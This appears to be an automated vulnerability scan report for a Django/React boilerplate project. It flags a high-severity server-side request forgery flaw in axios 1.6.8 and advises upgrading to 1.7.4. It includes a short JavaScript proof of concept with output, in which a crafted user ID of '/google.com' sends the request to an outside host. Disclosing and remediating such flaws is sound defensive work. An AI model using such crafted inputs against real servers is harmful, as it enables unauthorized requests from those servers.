Vulnerabilities

 1 via 1 paths

Dependencies

 129

Source

 GitHub

Commit

 37cb4d29

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Severity
  • 1
Status
  • 1
  • 0
  • 0

high severity

Server-side Request Forgery (SSRF)

  • Vulnerable module: axios
  • Introduced through: axios@1.6.8

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate#37cb4d29a35886fe431d5797246534db912e0cc2 axios@1.6.8
    Remediation: Upgrade to axios@1.7.4.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) through unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. An attacker can manipulate the server to make unauthorized requests by exploiting this behavior.

PoC


const axios = require('axios');

this.axios = axios.create({
  baseURL: 'https://userapi.example.com',
});

//userId = '12345';
userId = '/google.com'

this.axios.get(`/${userId}`).then(function (response) {
  console.log(`config.baseURL:  ${response.config.baseURL}`);
  console.log(`config.method:   ${response.config.method}`);
  console.log(`config.url:      ${response.config.url}`);
  console.log(`res.responseUrl: ${response.request.res.responseUrl}`);
});

Output:

config.baseURL:  https://userapi.example.com
config.method:   get
config.url:      //google.com
res.responseUrl: http://www.google.com/

Remediation

Upgrade axios to version 1.7.4 or higher.

References

Server-side Request Forgery (SSRF) vulnerability report